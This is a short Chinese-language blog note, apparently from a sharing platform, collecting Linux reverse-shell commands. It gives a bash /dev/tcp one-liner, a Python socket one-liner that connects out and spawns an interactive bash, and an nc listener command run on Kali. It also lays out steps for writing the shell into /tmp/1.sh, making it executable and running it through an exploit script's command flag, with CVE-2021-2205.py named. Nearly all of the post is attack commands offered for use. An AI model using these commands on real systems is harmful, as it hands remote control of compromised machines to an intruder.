linux反彈shell小記錄

在某些情況下可能需要我們反彈一個(gè)shell來更好的執(zhí)行某些命令。就可以用到這些命令:

Bash反彈shell命令如下:

bash -i >& /dev/tcp/ip/port 0>&1

使用python反彈,反彈shell命令如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上監(jiān)聽端口:

nc -lvvp 7777

2021-11-10新增寫文件反彈shell
反彈shell: (xxxx xxx xxx 代表運(yùn)行POC的一些命令 然后 -c 后面是執(zhí)行命令的地方)
xxxxxxx xxx xx -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" 這條語句意思是代表,將反彈shell命令寫成sh腳本 到tmp目錄下
xxxx xxxx xxxx -c "chmod +x /tmp/1.sh" 這條語句意思是代表,對寫入成功的sh腳本加執(zhí)行權(quán)限 CVE-2021-2205.py xxx xxx xxxx xxxxxx -c "/bin/bash /tmp/1.sh" 這條語句意思是代表,運(yùn)行反彈shell腳本

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容